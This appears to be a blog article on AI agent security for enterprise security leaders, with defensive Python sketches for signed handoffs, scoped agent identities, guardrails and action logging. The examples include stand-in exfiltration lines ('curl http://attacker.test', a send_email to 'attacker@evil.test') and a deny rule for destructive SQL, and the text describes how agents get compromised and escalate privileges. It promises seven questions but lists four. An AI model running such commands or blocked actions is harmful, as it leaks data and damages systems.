Cybersecurity has never been a static field, but what’s happening right now with AI agents is unlike anything we’ve seen before.

For decades, protecting digital systems basically meant building walls, monitoring entry points, and responding to known threats. It worked — not perfectly, but it worked. Now, the rules of the game have shifted pretty dramatically. 🎯

AI agents have left the research labs and moved straight into the heart of corporate operations. We’re not talking about chatbots that answer questions or assistants that summarize emails. We’re talking about autonomous systems that execute complex tasks, make decisions, access databases, modify code, send communications, and chain together entire workflows — all without human intervention at every step.

Microsoft, Google, Anthropic, OpenAI, and Salesforce are already deploying agentic AI systems that operate across applications and data, well beyond simple chat interfaces. Gartner projects that 40% of enterprise applications will incorporate task-specific AI agents by 2026, up from less than 5% in 2025. That’s rocket-speed adoption. 🚀

The problem is that threats are growing just as fast, and defense mechanisms clearly aren’t keeping up. Vulnerabilities in the Model Context Protocol (MCP), prompt injection attacks, data exfiltration through AI assistants — the attack surface is expanding faster than the defenses designed to protect it. This imbalance between the speed of adoption and the speed of threats is exactly what puts AI agent security at the center of today’s most urgent technology conversations.

The risks stopped being theoretical a long time ago. In a controlled red-team exercise, McKinsey’s internal AI platform, called Lilli, was compromised by an autonomous agent that gained broad system access in under two hours. Two hours. That’s a brutal demonstration of how agentic threats can outpace human response times without breaking a sweat.

A Dark Reading survey found that 48% of cybersecurity professionals now identify agentic AI and autonomous systems as the most dangerous attack vector out there. And the financial impact matches: according to IBM’s 2025 Cost of a Data Breach report, breaches caused by shadow AI cost an average of $4.63 million per incident — roughly $670,000 more than a standard breach. The exposure isn’t just bigger; it’s structurally different. Agentic attacks cut across systems, exfiltrate data, and escalate privileges at machine speed — before a human analyst can even open a ticket.

Why AI agents create an entirely new attack surface

To understand the scale of the challenge, you need to look closely at what makes these agents fundamentally different from any software that came before them. A modern AI agent doesn’t just respond to commands. It interprets context, infers intent, plans sequences of actions, and executes those actions in a chained fashion across real environments. That means it needs access to resources, permissions, and data that no traditional software has ever concentrated in a single point. That concentration of power, by itself, is already an invitation for serious cybersecurity problems.

As Barak Turovsky, Operating Advisor at Bessemer Venture Partners and former Chief AI Officer at General Motors, points out: AI agents aren’t just another application surface. They’re autonomous actors with high privileges, capable of reasoning, acting, and chaining workflows across systems. The core risk isn’t the vulnerability itself — it’s the unbounded capability these agents can accumulate.

What makes the situation even more delicate is that agents frequently operate in multi-agent pipelines, where one agent orchestrates others, passing instructions, data, and context between them. When you have a chain of agents working together, every handoff point between them is a potential vulnerability. A malicious instruction injected at the beginning of the chain can propagate and amplify throughout the entire sequence, causing far more damage than any isolated attack could.
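To make the handoff risk concrete, here is a minimal Python sketch of one common mitigation: signing every inter-agent message so a downstream agent can verify integrity and sender before acting on it. All names here are hypothetical, and a real pipeline would use per-pair keys from a secrets manager rather than a shared constant.

```python
import hmac
import hashlib
import json

# Hypothetical shared key for illustration only; in practice each agent
# pair would use its own key retrieved from a secrets manager.
PIPELINE_KEY = b"example-only-key"

def sign_handoff(sender: str, payload: dict) -> dict:
    """Wrap an inter-agent message in a signed envelope."""
    body = json.dumps({"sender": sender, "payload": payload}, sort_keys=True)
    mac = hmac.new(PIPELINE_KEY, body.encode(), hashlib.sha256).hexdigest()
    return {"body": body, "mac": mac}

def verify_handoff(envelope: dict, allowed_senders: set[str]) -> dict:
    """Reject messages that were tampered with or come from an unexpected agent."""
    expected = hmac.new(PIPELINE_KEY, envelope["body"].encode(),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, envelope["mac"]):
        raise ValueError("handoff integrity check failed")
    message = json.loads(envelope["body"])
    if message["sender"] not in allowed_senders:
        raise ValueError(f"unexpected sender: {message['sender']}")
    return message["payload"]

# A downstream agent only accepts instructions from its known orchestrator.
env = sign_handoff("orchestrator", {"task": "summarize Q3 report"})
print(verify_handoff(env, allowed_senders={"orchestrator"}))
```

Signed handoffs stop tampering and spoofing at the seams between agents, but not a malicious instruction that enters through legitimate input at the top of the chain; that still requires content-level defenses.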

This challenge is amplified by a unique property of agents: their behavior is non-deterministic. As Jason Chan, cybersecurity leader and Operating Advisor at Bessemer, explains, much of the power that agents offer comes from the ability to specify an outcome without documenting every step needed to achieve it in detail. If we’ve learned anything from rule-based security, it’s that it can and will be subverted. Traditional controls assume predictable execution. Agents don’t offer that — and that’s why the industry needs approaches built specifically for this context, not just adaptations of what already existed.

On top of that, AI agents interact with the outside world in ways that dramatically expand the attack surface. They browse the web, consume third-party APIs, process user-submitted documents, and execute code in real time. Each of these interactions is an open door for what the security community has started calling agentic threats. Prompt injection, context poisoning, and tool manipulation are just a few examples of how attackers are already exploiting these gaps in practice.

As the latest OWASP analysis points out, AI agents amplify existing vulnerabilities more than they introduce entirely new ones. The threat categories are familiar: credential theft, privilege escalation, data exfiltration. What’s changed is the blast radius and the speed. Dean Sysman, co-founder of Axonius and Venture Advisor at Bessemer, adds that an agent doesn’t share a human’s intuitive sense of what it shouldn’t do: given a goal or an optimization function, it will take actions that are obviously harmful or dangerous to any human observer.

The four layers of the agentic attack surface

While no two companies face exactly the same exposure, the attack surface of an agentic environment consistently maps to four layers:

  • The endpoint, where coding agents like Cursor and GitHub Copilot operate directly in the developer’s environment
  • The API and MCP gateway, where agents call tools and exchange instructions with each other
  • SaaS platforms such as Salesforce and Microsoft 365, where agents are embedded in core business workflows
  • The identity layer, where credentials and access privileges are granted, accumulated, and — all too often — left unreviewed

Understanding which of these layers carries the most risk in your specific environment is the best starting point for any agent security strategy.

Privilege escalation: the risk that worries experts the most

Of all the threats emerging with the mass adoption of AI agents, privilege escalation is the one keeping security experts up at night. The concept itself isn’t new. Attackers trying to gain more permissions than they should have is a classic in cybersecurity history. What’s changed is the context and the scale. An AI agent that starts with limited permissions can, through a sequence of seemingly legitimate actions, end up accessing systems, data, and capabilities far beyond what was originally authorized. And the worst part is that this process can happen completely invisibly to security teams.

Mike Gozzo, Chief Product and Technology Officer at Ada, hits the nail on the head: AI agents aren’t tools — they’re actors. They make decisions, execute actions, and interact with systems on behalf of your customers. Securing an actor is a fundamentally different problem from securing a tool, and most of the industry hasn’t absorbed that difference yet.

The problem gets worse when you consider that many agents are deployed following the principle of convenience rather than the principle of least privilege. To get the agent running smoothly and without friction, development teams often grant broad permissions from the start, figuring they’ll tighten things up later. Spoiler: they rarely do. 😅 This pattern creates an environment where a compromised or poorly instructed agent has immediate access to critical resources, turning a small vulnerability into a security incident of catastrophic proportions.

The solution isn’t simple, but there’s a clear path forward. Organizations taking AI agent security seriously are implementing granular access control policies specific to agents, reviewing permissions at regular intervals, and auditing agent action logs with the same rigor they apply to critical systems. Beyond that, they’re starting to treat each agent as an independent digital identity, with its own credentials, a well-defined scope of action, and rapid revocation mechanisms for when something goes off the rails.
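A minimal sketch of that idea, assuming nothing beyond the Python standard library: each agent gets its own identity object with an explicit scope, an audit trail, and a one-call kill switch. The names and the permission format are illustrative.

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

@dataclass
class AgentIdentity:
    """Hypothetical per-agent identity: own credentials, explicit scope, fast revocation."""
    agent_id: str
    owner: str                      # the human accountable for this agent
    scopes: set[str] = field(default_factory=set)
    revoked: bool = False
    audit_log: list = field(default_factory=list)

    def authorize(self, action: str) -> bool:
        """Allow only in-scope actions, and log every decision either way."""
        allowed = not self.revoked and action in self.scopes
        self.audit_log.append(
            (datetime.now(timezone.utc).isoformat(), action, allowed))
        return allowed

    def revoke(self) -> None:
        """Kill switch: one call removes all of the agent's access."""
        self.revoked = True

crm_agent = AgentIdentity("crm-summarizer-01", owner="ana.souza",
                          scopes={"crm:read:accounts"})
assert crm_agent.authorize("crm:read:accounts")
assert not crm_agent.authorize("crm:delete:accounts")  # out of scope, logged
crm_agent.revoke()
assert not crm_agent.authorize("crm:read:accounts")    # revoked instantly
```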

A three-stage framework for securing AI agents

Securing AI agents is a systemic problem. Before a CISO can apply policies or respond to threats, they need to know what they’re dealing with. And before agents can be protected at runtime, they need to have been configured correctly. The challenge breaks down into three stages, each one a prerequisite for the next.

Stage 1: Visibility — know what you have

Visibility is the first stage and often the most neglected. Most companies don’t have an accurate inventory of the AI agents operating in their environment: which agents exist, what permissions they hold, who authorized them, and what they were built for. Without this foundation, everything that follows is guesswork.

Visibility means establishing a real-time map of agents across your entire infrastructure. This includes coding agents like Cursor and GitHub Copilot at the endpoint, orchestration agents embedded in SaaS platforms, and API-connected agents operating through MCP servers and third-party integrations. Intent matters here too. An agent provisioned for a narrow task but with broad access to a CRM, for example, is a misconfiguration waiting to become an incident.

Stage 2: Configuration — reduce the blast radius before an attack happens

With the inventory established, the next question is: are these agents configured securely? This is where most of today’s exploitable risk lives. The most common misconfigurations follow a predictable pattern: excessive privilege, weak or shared credentials, policy violations that went unnoticed because no tool was looking for them, and abnormal access patterns that don’t trigger traditional alerts because they’re technically within policy.

Configuration isn’t a one-time audit. It’s a continuous posture. An agent’s attack surface changes every time it’s updated, given a new tool, or connected to a new service. CISOs need solutions that monitor configuration drift in real time — not in quarterly reviews.

Stage 3: Runtime protection — detect and respond at machine speed

The final stage is where the agentic threat becomes qualitatively different from everything that came before. A compromised agent doesn’t wait. It reasons, pivots, and escalates access autonomously — often completing an entire attack chain in the time it takes a human analyst to open a ticket.

Runtime protection requires three capabilities that traditional security tools weren’t built to deliver: agentic investigation, which means understanding what the agent did and why; real-time detection that interprets non-deterministic behavior instead of looking for known signatures; and contextual enforcement that can halt a specific action without taking down the entire workflow.

That last capability — targeted intervention during execution — is where the market is most underdeveloped and where the clearest opportunity for innovation in security infrastructure exists. 🔐
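To make contextual enforcement more tangible, here is a simplified pre-execution hook that denies one specific tool call and lets the rest of the workflow continue. The policy shape and tool names are assumptions for illustration; a production system would need far richer context than argument inspection.

```python
# Deny rules as (tool, condition on arguments, reason). Illustrative only.
DENY_RULES = [
    ("send_email",
     lambda args: "@" in args.get("to", "")
                  and not args["to"].endswith("@example.com"),
     "external recipient not allowed for this agent"),
    ("run_sql",
     lambda args: "drop " in args.get("query", "").lower(),
     "destructive SQL blocked"),
]

def enforce(tool: str, args: dict) -> dict:
    """Check a single tool call against policy before it executes."""
    for rule_tool, condition, reason in DENY_RULES:
        if tool == rule_tool and condition(args):
            # Deny just this action; the agent receives the denial as
            # feedback and can continue with the rest of its task.
            return {"allowed": False, "reason": reason}
    return {"allowed": True}

print(enforce("send_email", {"to": "attacker@evil.test", "body": "exfil"}))
print(enforce("run_sql", {"query": "SELECT * FROM orders"}))
```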

Seven questions every CISO should be asking right now

Every team, regardless of size, needs to develop a tailored defensive strategy for protecting AI agents. Here are seven questions that can guide an internal audit and help map where the biggest gaps are:

  • Scope and pain: How extensively are AI agents deployed in your environment today? What’s your biggest concern regarding their security risks? And are you more worried about coding agents like Cursor and Claude, or about general-purpose agents?
  • Architecture: At which layer do agent security controls make the most sense — endpoint, network/proxy, or identity management? Is there room for purpose-built solutions designed exclusively for agents?
  • Market noise: With so many AI agent security startups popping up, how do you tell them apart?
  • Detection and prevention: Are you more focused on gaining visibility into agent usage or on preventing AI agents from being compromised?

Five priority actions for CISOs in 2026

The threat is real, the tools are still nascent, and the window to get ahead is closing. Five priorities stand out for CISOs navigating the challenge of agentic security this year.

1. Align the organization’s risk posture before buying anything

The instinct under pressure is to start buying. Resist. Before evaluating vendors or deploying controls, security teams need clarity on where the organization actually stands on AI agents. As Jason Chan puts it: define, at the business level, your organization’s position on agents. Are you going all in? Testing cautiously? Saying no until things get clearer? That position will help security teams align their approach with the organization’s expectations and risk tolerance. A CISO in aggressive deployment mode needs a fundamentally different security posture than one in observation mode.

2. Treat agents as production infrastructure, not as applications

The most common mistake is applying the existing application security playbook to agents. It doesn’t work. As Barak Turovsky observes, most companies are layering monitoring on top of poorly constrained agents — which is the wrong order. The right order is: ownership first, then constraints, then monitoring. Define who’s responsible for each agent, limit its permissions to what the task requires, and implement guardrails at the action level before any monitoring tool gets turned on. Organizations that get this right won’t just be more secure — they’ll deploy agents faster, because they actually trust them.

3. Start narrow and expand deliberately

Agents accumulate access over time, and the risk surface grows with it. Dean Sysman offers a clear prescription: have a gradual, well-defined plan for the inputs and outputs available to each agent, make sure they’re very narrowly scoped, and expand incrementally. Launch agents with the minimum permissions needed for a specific task, validate their behavior in that constrained environment, and expand access only when there’s clear evidence it’s necessary and safe. Granting broad access upfront in the name of flexibility or speed is precisely how organizations create the privilege accumulation problem that attackers will exploit.
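In practice, that expansion can be gated by policy. The sketch below assumes a hypothetical rule: a new scope is granted only with a named owner, a justification, and a minimum incident-free period in the constrained rollout.

```python
from datetime import date

MIN_CLEAN_DAYS = 30  # assumed policy threshold, not a recommendation

def request_scope_expansion(agent_id: str, new_scope: str, owner: str,
                            justification: str, incident_free_days: int) -> bool:
    """Grant a new scope only when the constrained rollout produced evidence."""
    if incident_free_days < MIN_CLEAN_DAYS:
        print(f"[DENIED] {agent_id}: only {incident_free_days} clean days")
        return False
    print(f"[GRANTED] {date.today()} {agent_id} +{new_scope} "
          f"(owner={owner}, why={justification})")
    return True

request_scope_expansion("lead-scorer", "crm:write:leads", "ana.souza",
                        "pilot validated read-only scoring",
                        incident_free_days=45)
```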

4. Close the gap between freedom and control with guardrails, not just monitoring

The fundamental tension in agentic AI is that the same autonomy that makes agents powerful is what makes them dangerous. As Dean notes, the great value of agents is the ability to decide to do things on their own, but the guardrails around what they shouldn’t do need to be incredibly comprehensive. Monitoring can tell you what an agent did. Guardrails determine what it’s allowed to do in the first place. The security leaders who get this right will be the ones who define those boundaries explicitly — at the action level, not just the access level — before an incident forces the conversation.
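A guardrail in this sense can be as simple as an explicit allowlist with deny-by-default semantics, the inverse of a monitoring-first posture. The agent name, action names, and escalation category below are illustrative:

```python
# Action-level policy: anything not listed is denied by default.
GUARDRAILS = {
    "support-agent": {
        "allowed_actions": {"read_ticket", "draft_reply", "search_kb"},
        "requires_human_approval": {"issue_refund"},
    },
}

def check_action(agent_id: str, action: str) -> str:
    policy = GUARDRAILS.get(agent_id)
    if policy is None:
        return "deny"                      # unknown agent: deny by default
    if action in policy["requires_human_approval"]:
        return "escalate"                  # pause and ask a human
    if action in policy["allowed_actions"]:
        return "allow"
    return "deny"                          # not on the allowlist

for action in ("draft_reply", "issue_refund", "delete_account"):
    print(action, "->", check_action("support-agent", action))
```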

5. Give every agent an identity and treat it like an employee

Most agents today inherit broad permissions from the systems they connect to, with no zero-trust boundary governing what they can actually reach. Mike Gozzo offers a precise diagnosis: give agents an identity, define the scope of access, and audit what they do the same way you would for any other actor in your environment. A CISO’s first move should be ensuring every agent has a managed identity with scoped authentication — not a shared API key with unrestricted access. If you can’t answer the questions — what can this agent do, on whose behalf, and who approved it — the same way you’d answer them about a human employee, you’re not ready for the autonomy these systems are about to have. 👁️

What companies need to internalize right now

The conversation around AI agent security is still overly theoretical in most organizations — which is a serious problem considering 2026 is already underway. The pressure to adopt AI agents is real and will keep growing, because the productivity and automation benefits are genuinely significant. Ignoring the cybersecurity risks associated with this adoption isn’t a responsible option, but freezing up out of fear doesn’t help anyone either.

The path forward lies in building security practices that keep pace with adoption. That starts with including security teams in conversations about agents from the beginning — not after the system is already in production. Integrating security into the agent development lifecycle is critical to preventing structural vulnerabilities from being baked in at the design stage. Clearly defining each agent’s scope of action, mapping every resource it will access, and establishing explicit access control policies before the first line of code is written are steps that make an enormous difference.

Investing in visibility remains one of the highest-impact actions you can take. One of the biggest problems with agentic threats is that they often fly under the radar because organizations simply don’t have adequate tools to see what agents are doing in detail. Implementing detailed logging of agent actions, creating dedicated monitoring dashboards, and establishing behavioral baselines might sound like straightforward steps, but they’re the difference between detecting an incident in minutes and finding out weeks later.
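A stripped-down sketch of what that looks like: structured, append-only action logs plus a trivial baseline check that flags tools an agent has never used before. Real baselines would be statistical and per-environment; this only shows the shape of the data.

```python
import json
from collections import Counter
from datetime import datetime, timezone

action_log: list[dict] = []

def log_action(agent_id: str, tool: str, target: str) -> None:
    """Structured, append-only record of every agent action."""
    action_log.append({
        "ts": datetime.now(timezone.utc).isoformat(),
        "agent": agent_id, "tool": tool, "target": target,
    })

def deviates_from_baseline(agent_id: str, baseline_tools: set[str]) -> list[str]:
    """Flag tools this agent used that its historical baseline never included."""
    used = Counter(e["tool"] for e in action_log if e["agent"] == agent_id)
    return [tool for tool in used if tool not in baseline_tools]

log_action("pr-reviewer", "repo:read", "repo/main")
log_action("pr-reviewer", "shell", "curl http://attacker.test")  # never seen before
print(deviates_from_baseline("pr-reviewer", baseline_tools={"repo:read"}))
print(json.dumps(action_log[-1], indent=2))
```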

Agentic AI isn’t coming. It’s already here. But the security infrastructure to match it isn’t — not yet. The CISOs who close that gap deliberately, starting now, will define how enterprise AI works for the rest of the decade; those who wait until 2027 will spend that time responding to incidents. Organizations that treat AI agent security as a strategic priority today will be far better positioned to capture the technology’s benefits without paying the price of a catastrophic breach.
